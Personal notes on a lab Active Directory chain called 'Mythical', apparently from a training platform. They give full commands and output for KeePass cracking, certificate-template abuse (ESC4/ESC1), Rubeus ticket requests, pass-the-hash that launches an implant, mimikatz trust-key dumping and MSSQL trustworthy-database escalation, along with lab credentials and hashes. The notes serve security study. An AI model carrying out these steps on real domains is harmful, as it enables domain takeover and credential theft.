Mythical (Chain)
This is not a writeup, just my notes about the machine.
Credentials
Username
Password
Method
Scope
mythic_admin
wG4jmjNcEcfmzv3QbEcJdSVTDEjCnX
Provided by Client
Mythical Server
domjoin
hKvhexY5BtAgtWAY
Found on Keepass
domain user
Keepass Database
741852
Cracked from keepass database
Keepass database
svc_ldap
osaRXWkDf2y5SGh5
Disassembly binary
Domain User
✅ Valid Usernames
Administrator
Guest
krbtgt
Wendy.Adams
William.Jennings
Julie.Khan
Alan.Rhodes
Jay.Little
Owen.Dunn
Howard.Frost
Naomi.Campbell
Judith.Smith
Nicholas.Hill
Karl.Kaur
Hilary.Pearson
Marcus.Elliott
Fiona.Knight
Jay.Miller
Josephine.Smith
Mohammad.Jones
Glen.Price
Amber.Hussain
Megan.Higgins
Donald.Burton
Jasmine.Smith
Kim.Byrne
Jack.Chambers
Danielle.Andrews
svc_ldap
svc_sql
root🔑 Passwords list
wG4jmjNcEcfmzv3QbEcJdSVTDEjCnX
hKvhexY5BtAgtWAY
741852
osaRXWkDf2y5SGh5Information Gathering
Nmap Scan
Machine 1
-
Machine 2
22/tcp open ssh
7443/tcp open oracleas-https
Machine 3
-Compromise DC01 Server
Initial Access
Situational Awareness
OS Name: Microsoft Windows Server 2022 Standard
System Type: x64-based PC
Current User: momo.ayase
MYTHICAL-US\Backup Admins
SeMachineAccountPrivilege (Create Computers)
Domain: mythical-us.vl
FQDN: dc01.mythical-us.vl
Not kerberoastable and asreproastable users
Checking the ARP table.
Myhichal > shell arp -a
Interface: 192.168.25.2 --- 0xa
Internet Address Physical Address Type
192.168.25.1 00-ff-5d-3b-65-7a dynamic
192.168.25.255 ff-ff-ff-ff-ff-ff static
224.0.0.22 01-00-5e-00-00-16 static
224.0.0.251 01-00-5e-00-00-fb static
224.0.0.252 01-00-5e-00-00-fc static
255.255.255.255 ff-ff-ff-ff-ff-ff static
Interface: 10.10.154.117 --- 0xe
Internet Address Physical Address Type
10.10.154.113 0a-5c-d9-b1-d6-ef dynamic
10.10.154.118 0a-35-98-7e-25-2b dynamic
10.10.154.119 0a-10-74-82-61-e1 dynamic
10.10.154.127 ff-ff-ff-ff-ff-ff static
169.254.169.250 0a-5c-d9-b1-d6-ef dynamic
169.254.169.254 0a-5c-d9-b1-d6-ef dynamic
224.0.0.22 01-00-5e-00-00-16 static
224.0.0.251 01-00-5e-00-00-fb static
224.0.0.252 01-00-5e-00-00-fc static
255.255.255.255 ff-ff-ff-ff-ff-ff static
Scanning the internal network
Tool: PortScanner
Myhichal > register_assembly PortScanner.exe
Myhichal > execute_assembly -Assembly PortScanner.exe hosts=192.168.25.1,10.10.154.113,10.10.154.117,10.10.154.118,10.10.154.119,10.10.154.127 ports=21,22,25,53,53,80,110,137,138,139,143,2049,3000,3306,443,464,514,631,636,8080,873,8888,989,135,137,138,139,389,445,464,3268,3269,5000,5900,8000,1433,9389,8443,88
192.168.25.1 : port 22 is open.
192.168.25.1 : port 873 is open.
192.168.25.1 : port 80 is open.
10.10.154.117 : port 53 is open.
10.10.154.117 : port 53 is open.
10.10.154.117 : port 135 is open.
10.10.154.117 : port 139 is open.
10.10.154.117 : port 464 is open.
10.10.154.117 : port 389 is open.
10.10.154.117 : port 3268 is open.
10.10.154.117 : port 445 is open.
10.10.154.117 : port 3269 is open.
10.10.154.117 : port 464 is open.
10.10.154.117 : port 88 is open.
10.10.154.117 : port 139 is open.
10.10.154.117 : port 636 is open.
10.10.154.117 : port 9389 is open.
10.10.154.118 : port 22 is open.
10.10.154.118 : port 80 is open.
10.10.154.119 : port 53 is open.
10.10.154.119 : port 135 is open.
10.10.154.119 : port 53 is open.
10.10.154.119 : port 389 is open.
10.10.154.119 : port 139 is open.
10.10.154.119 : port 445 is open.
10.10.154.119 : port 464 is open.
10.10.154.119 : port 3268 is open.
10.10.154.119 : port 9389 is open.
10.10.154.119 : port 3269 is open.
10.10.154.119 : port 88 is open.
10.10.154.119 : port 636 is open.
10.10.154.119 : port 139 is open.
10.10.154.119 : port 464 is open.
10.10.154.119 : port 1433 is open.Enumerating Rsync service and retrieving a keepass database
mythical > shell C:\_admin\cwrsync\bin\rsync.exe -av --list-only rsync://192.168.25.1
mythical Domain Backups
shell C:\_admin\cwrsync\bin\rsync.exe -av --list-only rsync://192.168.25.1/mythical
receiving incremental file list
drwxr-xr-x 4,096 2024/11/29 08:04:42 .
-rw-r--r-- 37 2024/11/29 07:39:26 flag.txt
-rw-r--r-- 1,605 2024/11/29 07:49:51 it.kdbx
mythical > shell C:\_admin\cwrsync\bin\rsync.exe -av rsync://192.168.25.1/mythical/flag.txt
mythical > shell C:\_admin\cwrsync\bin\rsync.exe -av rsync://192.168.25.1/mythical/it.kdbx Worth file: it.kdbx
Cracking keepass database
Attempting to retrieve the database hash using keepass2john returned File version '40000' is currently not supported! which means the format is not supported.
❯ keepass2john it.kdbx
! it.kdbx : File version '40000' is currently not supported!The tester used keepass4brute.sh instead.
#Installing dependencies
❯ sudo apt-get install keepassxc -y
❯ ./keepass4brute.sh it.kdbx /usr/share/seclists/Passwords/Leaked-Databases/rockyou-30.txt
keepass4brute 1.3 by r3nt0n
https://github.com/r3nt0n/keepass4brute
[+] Words tested: 950/1556 - Attempts per minute: 105 - Estimated time remaining: 5 minutes, 46 seconds
[+] Current attempt: 741852
[*] Password found: 741852
Privilege escalation on DC01 via ESC4
Discovering the user domjoin can use ADSC
During the enumeration using bloodhound the tester found the user domjoins belongs to Certificate Service DCOM Access which members of this group are allowed to connect to Certification Authorities in the enterprise.
Discovering a vulnerable template to ESC4
The users Momo.Ayase and domjoin possesses the SeMachineAccountPrivilege, which allows the creation of computer accounts. This privilege, combined with the configuration of a vulnerable certificate template, fulfills all the necessary requirements to carry out an ESC4 attack. Specifically, the certificate template allows members of the MYTHICAL-US\Domain Computers group to enroll for certificates.
mythical > register_assembly Certify.exe
mythical > execute_assembly -Assembly Certify.exe -Arguments find /vulnerable
_____ _ _ __
/ ____| | | (_)/ _|
| | ___ _ __| |_ _| |_ _ _
| | / _ \ '__| __| | _| | | |
| |___| __/ | | |_| | | | |_| |
\_____\___|_| \__|_|_| \__, |
__/ |
|___./
v1.1.0
[*] Action: Find certificate templates
[*] Using the search base 'CN=Configuration,DC=mythical-us,DC=vl'
[!] Vulnerable Certificates Templates :
CA Name : dc01.mythical-us.vl\mythical-us-DC01-CA
Template Name : Machine
Schema Version : 1
Validity Period : 1 year
Renewal Period : 6 weeks
msPKI-Certificate-Name-Flag : SUBJECT_ALT_REQUIRE_DNS, SUBJECT_REQUIRE_DNS_AS_CN
mspki-enrollment-flag : AUTO_ENROLLMENT
Authorized Signatures Required : 0
pkiextendedkeyusage : Client Authentication, Server Authentication
mspki-certificate-application-policy : <null>
Permissions
Enrollment Permissions
Enrollment Rights : MYTHICAL-US\Domain Admins S-1-5-21-614429729-4048209472-3755682007-512
MYTHICAL-US\Domain Computers S-1-5-21-614429729-4048209472-3755682007-515
MYTHICAL-US\Enterprise Admins S-1-5-21-614429729-4048209472-3755682007-519
Object Control Permissions
Owner : MYTHICAL-US\Enterprise Admins S-1-5-21-614429729-4048209472-3755682007-519
WriteOwner Principals : MYTHICAL-US\Domain Admins S-1-5-21-614429729-4048209472-3755682007-512
MYTHICAL-US\Domain Computers S-1-5-21-614429729-4048209472-3755682007-515
MYTHICAL-US\Enterprise Admins S-1-5-21-614429729-4048209472-3755682007-519
WriteDacl Principals : MYTHICAL-US\Domain Admins S-1-5-21-614429729-4048209472-3755682007-512
MYTHICAL-US\Domain Computers S-1-5-21-614429729-4048209472-3755682007-515
MYTHICAL-US\Enterprise Admins S-1-5-21-614429729-4048209472-3755682007-519
WriteProperty Principals : MYTHICAL-US\Domain Admins S-1-5-21-614429729-4048209472-3755682007-512
MYTHICAL-US\Domain Computers S-1-5-21-614429729-4048209472-3755682007-515
MYTHICAL-US\Enterprise Admins S-1-5-21-614429729-4048209472-3755682007-519
Certify completed in 00:00:13.3001595Creating a computer account
The tester proceeded to create a computer account with possess full permission over Machine template.
mythical > make_token mythical-us.vl\domjoin hKvhexY5BtAgtWAY
mythical > register_assembly [Sharpmad.exe]
mythical > execute_assembly -Assembly Sharpmad.exe MAQ -Action new -MachineAccount z3r0 -MachinePassword password123
[+] Machine account z3r0 addedAbusing of template ESC4
Once the machine is created, the tester proceeded to impersonate the machine account for subsequently modify the machine template and make it vulnerable to ESC1.
mythical > make_token mythical-us.vl\z3r0$ password123
mythical > powershell_import PowerView.ps1
mythical > powershell Add-DomainObjectAcl -TargetIdentity Machine -PrincipalIdentity "Domain Users" -RightsGUID "0e10c968-78fb-11d2-90d4-00c04f79dc55" -TargetSearchBase "LDAP://CN=Configuration,DC=mythical-us,DC=vl" -Verbose
mythical > powershell Set-DomainObject -SearchBase "CN=Certificate Templates,CN=Public Key Services,CN=Services,CN=Configuration,DC=mythical-us,DC=vl" -Identity Machine -Set @{'mspki-certificate-name-flag'=1} -Verbose
mythical > powershell Set-DomainObject -SearchBase "CN=Certificate Templates,CN=Public Key Services,CN=Services,CN=Configuration,DC=mythical-us,DC=vl" -Identity Machine -Set @{'pkiextendedkeyusage'='1.3.6.1.5.5.7.3.2'} -Verbose
mythical > powershell Set-DomainObject -SearchBase "CN=Certificate Templates,CN=Public Key Services,CN=Services,CN=Configuration,DC=mythical-us,DC=vl" -Identity Machine -Set @{'mspki-certificate-application-policy'='1.3.6.1.5.5.7.3.2'} -VerboseAbusing of template ESC1
Once the template is modified from ESC4 to ESC1 the tester proceeded to request a certificate template in behalf of Administrator account.
mythical > execute_assembly -Assembly Certify.exe request /ca:dc01.mythical-us.vl\mythical-us-DC01-CA /template:Machine /altname:Administrator
_____ _ _ __
/ ____| | | (_)/ _|
| | ___ _ __| |_ _| |_ _ _
| | / _ \ '__| __| | _| | | |
| |___| __/ | | |_| | | | |_| |
\_____\___|_| \__|_|_| \__, |
__/ |
|___./
v1.1.0
[*] Action: Request a Certificates
[*] Current user context : MYTHICAL-US\Momo.Ayase
[*] No subject name specified, using current context as subject.
[*] Template : Machine
[*] Subject : CN=Momo Ayase, OU=employees, DC=mythical-us, DC=vl
[*] AltName : Administrator
[*] Certificate Authority : dc01.mythical-us.vl\mythical-us-DC01-CA
[*] CA Response : The certificate had been issued.
[*] Request ID : 6
[*] cert.pem :
-----BEGIN RSA PRIVATE KEY-----
MIIEpAIBAAKCAQEAs0RAkX3/eZbqhx3UK33Hk9OKQ3EXigocOTyXA/6TAoPgplKc
wWUa2mC89csmPSuFRLkvjcNq4c8U3QTFJNFhf0KiRnv1DbldSz32Ygax/m2YW6sj
Aiyoph5M8PY8tydGHZ8rK0QSpBMv0OsE/DSTVzNJ3sebgFUTcatx6pgKoYwaOP9X
OadXrHo5Qvd1LyXmduWnG+cenXS+cHMrEdXfEaoRGCS9j8vBdqe6XqFDt/rTALw5
FX04yevGLbE8CpZn1d1CZR6foSFkyU7FmmQUszTGQxW6av/OwApDvXztkOlDdkjq
waL2NWPVSAkPA0Cb2O/+Mw8CyxUVJ/QnVYHXaBo59/Y7jtAAYuLnbqXOoRFScVc5
XDAELFjZYAc6CVF9vr1hlp7XAoGAbkXJrdC2kJh83WohyATV1/JIHQ8y3JgmFuL/
LzpZ7uJuaZojVCWHlJSkmzo9B/xcFcwpz+EqQ8rXWrORQQZ7EJNEGrNncadh/Cmm
9RBcBXC/ShpQpANyMXOMMJSMsN0jmCsotMhvrg2Csfq/u6anW2ShuLJD2DQ/FK+6
fs3B57UCgYBqVMK9X1QVbWwVkB7mcC1NoSG6pm7fdHJUWc+HuYcX1/l0bacGsPoW
DO702PWBGLVtCjv/6j4cJe/ybx1bfBNoC1HiuBD3mbVE2LYAZdRPDjuLBr9CuCqf
SfbcAOZab0QiVQHH/APyAhDI4T3f3uJxqLXbflOwQzF2G98m1awGpw==
-----END RSA PRIVATE KEY-----
-----BEGIN CERTIFICATE-----
MIIGiTCCBHGgAwIBAgITJwAAAAbjmfLm93ya2AAAAAAABjANBgkqhkiG9w0BAQsF
ADBPMRIwEAYKCZImiZPyLGQBGRYCdmwxGzAZBgoJkiaJk/IsZAEZFgtteXRoaWNh
bC11czEcMBoGA1UEAxMTbXl0aGljYWwtdXMtREMwMS1DQTAeFw0yNTA1MTAwMTIz
MTZaFw0yNjA1MTAwMTIzMTZaMFoxEjAQBgoJkiaJk/IsZAEZFgJ2bDEbMBkGCgmS
JomT8ixkARkWC215dGhpY2FsLXVzMRIwEAYDVQQLEwllbXBsb3llZXMxEzARBgNV
BAMTCk1vbW8gQXlhc2UwggEiMA0GCSqGSIb3DQEBAQUAA4IBDwAwggEKAoIBAQCz
c3w36BvY9GOURwg/Ex8UkgqZme+X4Ke6uc4S0ZwN0UGmPOuvhNazlqUPWJDZmSWj
mlRxR9xczoEvNC/ZTD4pjPpLwPyDGA2/mpVYMbei1MUY/DYE3FRNathb6AnavlcY
ywYfO2egOgaH0yKf8E48y8ipclP7Wm8KrshMhskSYUMzgHM3Fnb3/5B3LS9BQg9/
FXLPjB0lU0H12ysjgeiORY3wSwzwnGG8Izd7AC/B3YHrkjsYKk/1ut7KMvPWb6y3
J35HDR64rV+f616+Jawd5YAgCskZ/796EnCYbDj7AoQ2/b2edIpB/zK9lW+sjD9f
B6f18HAGXC+nV71tI3WjSxld1/xgDvGxSHJpDnWyOl703HP4gSJ/6tdhL/+Y
-----END CERTIFICATE-----Intrusionz3r0@kali:$ openssl pkcs12 -in admin.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out cert.pfx
Enter Export Password:
Verifying - Enter Export Password:Request TGT using administrator certificate
Mythical > execute_assembly -Assembly Rubeus.exe asktgt /user:Administrator /certificate:C:\_admin\admin.pfx /getcredentials /nowrap
______ _
(_____ \ | |
_____) )_ _| |__ _____ _ _ ___
| __ /| | | | _ \| ___ | | | |/___)
| | \ \| |_| | |_) ) ____| |_| |___ |
|_| |_|____/|____/|_____)____/(___/
v2.3.3
[*] Action: Ask TGT
[*] Got domain: mythical-us.vl
[*] Using PKINIT with etype rc4_hmac and subject: CN=Momo Ayase, OU=employees, DC=mythical-us, DC=vl
[*] Building AS-REQ (w/ PKINIT preauth) for: 'mythical-us.vl\Administrator'
[*] Using domain controller: fe80::c7e0:a060:1ed5:2f97:88
[+] TGT request successful!
[*] base64(ticket.kirbi):
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
ServiceName : krbtgt/mythical-us.vl
ServiceRealm : MYTHICAL-US.VL
UserName : Administrator (NT_PRINCIPAL)
UserRealm : MYTHICAL-US.VL
StartTime : 5/9/2025 6:51:06 PM
EndTime : 5/10/2025 4:51:06 AM
RenewTill : 5/16/2025 6:51:06 PM
Flags : name_canonicalize, pre_authent, initial, renewable, forwardable
KeyType : rc4_hmac
Base64(key) : 2wCULMc6OnWNq1ytFDzaCA==
ASREP (key) : 1C7C7FA9FF23585C3DEE9FD18F999B04
[*] Getting credentials using U2U
CredentialInfo :
Version : 0
EncryptionType : rc4_hmac
CredentialData :
CredentialCount : 1
NTLM : C583EF48C5ED66C727AECB6FAB87AC12
Obtain a shell as Administrator using pass the hash.
mythical > powershell_import Invoke-SMBExec.ps1
mythical > powershell Invoke-SMBExec -Target DC01 -Domain mythical-us.vl -Username Administrator -Hash C583EF48C5ED66C727AECB6FAB87AC12 -Command "C:\ProgramData\google\update.exe"
Compromising DC02
Initial Access
Discovering a Outbound trust relationship
The tester identified that the domain mythical-us.vl has an outbound trust to mythical-eu.vl, meaning it accepts authentication from users in the mythical-eu.vl domain.
mythical > powershell_import PowerView.ps1
mythical > powershell Get-DomainTrust
SourceName : mythical-us.vl
TargetName : mythical-eu.vl
TrustType : WINDOWS_ACTIVE_DIRECTORY
TrustAttributes : FILTER_SIDS
TrustDirection : Outbound
WhenCreated : 12/3/2024 6:12:53 PM
WhenChanged : 5/10/2025 1:26:04 AM
Obtaining the trust hash accounts
Using mimikatz, the tester dumped the trust relationship secrets and recovered the NTLM hash of the trust account MYTHICAL-US$, stored within mythical-eu.vl.
mythical > shell C:\Temp\mimikatz.exe privilege::debug "lsadump::trust /patch" exit
.#####. mimikatz 2.2.0 (x64) #19041 Sep 19 2022 17:44:08
.## ^ ##. "A La Vie, A L'Amour" - (oe.eo)
## / \ ## /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
## \ / ## > https://blog.gentilkiwi.com/mimikatz
'## v ##' Vincent LE TOUX ( vincent.letoux@gmail.com )
'#####' > https://pingcastle.com / https://mysmartlogon.com ***/
mimikatz(commandline) # privilege::debug
Privilege '20' OK
mimikatz(commandline) # lsadump::trust /patch
Current domain: MYTHICAL-US.VL (MYTHICAL-US / S-1-5-21-614429729-4048209472-3755682007)
Domain: MYTHICAL-EU.VL (MYTHICAL-EU / S-1-5-21-1148612195-3581135157-3534241443)
[ In ] MYTHICAL-US.VL -> MYTHICAL-EU.VL
[ Out ] MYTHICAL-EU.VL -> MYTHICAL-US.VL
* 5/9/2025 6:26:04 PM - CLEAR - 04 21 4d b3 36 46 d0 51 ed df 29 36 9d e2 8e d3 3e fb 63 51 ba 5f 95 ac b6 8c 14 23 18 d2 0d da 68 de e1 2c 07 26 45 9a 0b 30 e8 06 55 67 93 51 e4 43 2f dc 16 e9 86 33 ba 8a 44 06 52 12 2d aa 67 e0 bd 08 99 9d e9 3d 3a 4b 27 58 1f 12 3d 7f 32 44 e1 81 3c 8e fa 09 4b 17 43 70 dd aa ef 2c df 36 43 d7 27 20 76 18 75 aa 25 9a 95 9f 06 db 84 0b af b0 72 fd 8f 2b 20 ab 50 8d 4a c0 f6 1b 53 d7 83 74 e1 79 0d 4e 2f 9d d6 9a bb 7d 68 2f bc 7d 77 72 ea 04 88 7f 43 5a 1b 18 9a c6 81 96 e3 82 cd 58 28 5c 39 d8 80 8f 6d 99 ee 4f a0 75 29 97 d2 ee 6f 82 03 b8 3d 08 5c a7 14 82 2a 02 f3 15 8f 58 fe b9 63 60 f1 55 ba 6b a9 69 b6 be d8 38 79 5e 3a 18 75 f3 e1 fe 62 7d f5 fb 7f b5 9d e8 4b 36 4e 15 5e 32 63 a1 f0 3a d2 7c e3 bc
* aes256_hmac 1747706d71b79f85f7807a918f8e17ef527dc4834f9e4ea8c95d15b56b3d4785
* aes128_hmac 427fc3a8831a6b64030b368422f038de
* rc4_hmac_nt 5e2ba07271159d53eaa486a65b9a998b
[ In-1] MYTHICAL-US.VL -> MYTHICAL-EU.VL
[Out-1] MYTHICAL-EU.VL -> MYTHICAL-US.VL
* 5/9/2025 6:26:04 PM - CLEAR - a1 39 02 5e 0a 3d ce c0 af c9 6a ab 1c ea 0a 0a 7e 3f 20 d2 ea f6 95 93 c2 9f f8 7e
* aes256_hmac cecbd91e50ff3ee7fbd725fbe9e2f3ea4d4445e549100607c3f2239307391076
* aes128_hmac 652888ee3ab5fac7ea1ebf84e423d59d
* rc4_hmac_nt eb921a2b0e9d626559dab0f54fdc6498
mimikatz(commandline) # exit
Bye!
With this hash, the tester used Rubeus to request a Kerberos TGT on behalf of mythical-us$ from the mythical-eu.vl domain controller:
mythical > execute_assembly -Assembly Rubeus.exe asktgt /domain:mythical-eu.vl /user:mythical-us$ /rc4:5e2ba07271159d53eaa486a65b9a998b /nowrap
______ _
(_____ \ | |
_____) )_ _| |__ _____ _ _ ___
| __ /| | | | _ \| ___ | | | |/___)
| | \ \| |_| | |_) ) ____| |_| |___ |
|_| |_|____/|____/|_____)____/(___/
v2.3.3
[*] Action: Ask TGT
[*] Using rc4_hmac hash: 5e2ba07271159d53eaa486a65b9a998b
[*] Building AS-REQ (w/ preauth) for: 'mythical-eu.vl\mythical-us$'
[*] Using domain controller: 10.10.242.23:88
[+] TGT request successful!
[*] base64(ticket.kirbi):
doIFrjCCBaqgAwIBBaEDAgEWooIEuTCCBLVhggSxMIIEraADAgEFoRAbDk1ZVEhJQ0FMLUVVLlZMoiMwIaADAgECoRowGBsGa3JidGd0Gw5teXRoaWNhbC1ldS52bKOCBG0wggRpoAMCARKhAwIBAqKCBFsEggRXl+D/Ikig+nqoBDeETobF+ls+ZJEO0gsjmEUEzmbu1EnwRZNOGKpEM5RE/nAYg6+U6xWNtu4ZUqsTSU1Xf0Zl89nG5Kg2aALBPGE+882b6dfuOcC+wzMr70yBN2ICfsLKPK2ysrUg54xpYs7jtqUpyKTDryUnl4uPTidRwPWXhGLafDUWfpYiKfW7xDZg6b7vXtmgs1RmdRt0RlPZMtfSAEjIsJQib/IPh/dbGBJ9OfMYKwEV3bsZwU/0uqWDVAM/pkyJ31GlpvkmBe76pQ2ZDJYDHl4f6BTcqYiJ0JJO1z/1A90u8cEv6kROt8FUINrO5y7p0AYxMhmjI+yHOzn2NlWEalbuqGbNHdGTkGiWWz83Yi6W0KmZuzTaZlCKrM0xLLJfXy555MLiIjdB7kp941mjbEoWnmVjSlYx1pjwPoF0rw9uzGOjZWQmYIFEOo0dk1bqJOY8TZDlUjmTR89zsKF/7YZuSl8Qgja3aPOx8paKfwS+cWor+UfldXtu8YNuw51H+ckIUTv/q8atF6YcoaT/TU7+E4ymnY3yPI8X8tecn4Qcs1PltAZFB/3iRmvOcubjoSJapkRjGHtI/PcaElnVmzUOt9VCUN37n2mbIxUSQIf19eOyxFtf1aeRV/HWLD9xsgevx+kkUkR0Tsoz9HuUYyelrLdZqlar+14RFGv8gZ4zCZ57YAxKS/0VYuNUJqR6PY00pLnVnRy9lROBB6DTLsv5qgu2t5f0eaWQ0fYFif76hwAKei+iPQ+IqHhWgCFRhf+P9mf0LMdZZ+bProrRmvZsjwHQFghher4jpC78lt78Jxgu2kUtATum4Xn4bBAQxTCcxamIno/8tc6FZb781nlL1lRmzM4+Dq/9AaGnsLLRmTtAp7/ujWyppTWr4zTnTJzJwp+NctNdgpqkEPwoVuxUbB/g3fraIIWMHJnARSoBt3mXWoQBFs+mfhd3ptmGkf4pCwcJRjVrPK1hUyVkEJuxE5L4ZbM4Yy652XuA+tcZMA8y8+KDo7RSv91RzykwTIB2Nh0ASy6FNXaStWxr75fVlcJNSYcVSLk9UlDvtWDmU494h+Q4xTzLZUmeE4qEaPXjhk57LJbOMOb+rPZeLoDi88/7xXdP3kz852cIpbBatr8gLuERhhB19Z09RjxT3zZ6GIv24fx5Qp6LSbPbiKqi7YeYQq2TR1qkDlC08PiQYHJOBS1SPdwnvygUqEPJugix3cIz0tt8DFqjD69kCcOW6Bsddag+R2OmJ7BZpjPjw/HQKhZJfvPmreeziBAPFPQqx3DfCG56LjUmPOYhK5tEXfcypoybwyji9W2Ja3wUqyKerdAE/n4FVkq20YG8D8Xa/BuN2oBxwQ+fewYaDHuvAXHBlyYUA10fwsSmcp5zGrBR/ghY2ozH0iKMuOBLbFVOif7VxPHB0DuVxjFNTxRKw4mbS/sHszKXFz8g9JuObIQiYv/RAJIL7x1MJ0FhZPT1B6OB4DCB3aADAgEAooHVBIHSfYHPMIHMoIHJMIHGMIHDoBswGaADAgEXoRIEEHBt5qfeaZSd851uzoMd4Q+hEBsOTVlUSElDQUwtRVUuVkyiGTAXoAMCAQGhEDAOGwxteXRoaWNhbC11cySjBwMFAEDhAAClERgPMjAyNTA1MTAwMjI1MzJaphEYDzIwMjUwNTEwMTIyNTMyWqcRGA8yMDI1MDUxNzAyMjUzMlqoEBsOTVlUSElDQUwtRVUuVkypIzAhoAMCAQKhGjAYGwZrcmJ0Z3QbDm15dGhpY2FsLWV1LnZs
ServiceName : krbtgt/mythical-eu.vl
ServiceRealm : MYTHICAL-EU.VL
UserName : mythical-us$ (NT_PRINCIPAL)
UserRealm : MYTHICAL-EU.VL
StartTime : 5/9/2025 7:25:32 PM
EndTime : 5/10/2025 5:25:32 AM
RenewTill : 5/16/2025 7:25:32 PM
Flags : name_canonicalize, pre_authent, initial, renewable, forwardable
KeyType : rc4_hmac
Base64(key) : cG3mp95plJ3znW7Ogx3hDw==
ASREP (key) : 5E2BA07271159D53EAA486A65B9A998B
Privilege escalation on DC02
Discovering a svc_ldap's plaintext credentials
The tester downloaded getusers.exe and proceeded to disassembly to analyze it.
Mythical > shell dir \\DC02.mythical-eu.vl\dev
Volume in drive \\DC02.mythical-eu.vl\dev has no label.
Volume Serial Number is CAB5-8F8F
Directory of \\DC02.mythical-eu.vl\dev
11/29/2024 09:02 AM <DIR> .
11/29/2024 09:02 AM 441,224 Autologon64.exe
11/29/2024 09:00 AM 4,608 getusers.exe
2 File(s) 445,832 bytes
1 Dir(s) 9,443,155,968 bytes free
The tester found svc_ldap's plain text credentials within getusers.exe .
Credentials found: svc_ldap:osaRXWkDf2y5SGh5
Abusing Trustworthy Database
mythical > make_token -username mythical-eu.vl\svc_sql -password osaRXWkDf2y5SGh5
mythical > shell c:\_admin\abc.exe -S tcp:10.10.249.167,1433 -Q "SELECT name, database_id, create_date FROM sys.databases;"
mythical > shell c:\_admin\abc.exe -S tcp:10.10.249.167,1433 -Q "SELECT a.name,b.is_trustworthy_on FROM master..sysdatabases as a INNER JOIN sys.databases as b ON a.name=b.name;"
mythical > shell c:\_admin\abc.exe -S tcp:10.10.249.167,1433 -d msdb -Q "SELECT rp.name as database_role, mp.name as database_user from sys.database_role_members drm join sys.database_principals rp on (drm.role_principal_id = rp.principal_id) join sys.database_principals mp on (drm.member_principal_id = mp.principal_id)"
mythical > shell c:\_admin\abc.exe -S tcp:10.10.249.167,1433 -d msdb -Q "CREATE OR ALTER PROCEDURE dbo.z3r0 WITH EXECUTE AS owner AS ALTER SERVER ROLE sysadmin ADD MEMBER [MYTHICAL-EU\svc_sql];"
mythical > shell c:\_admin\abc.exe -S tcp:10.10.249.167,1433 -d msdb -Q "EXEC dbo.z3r0;"
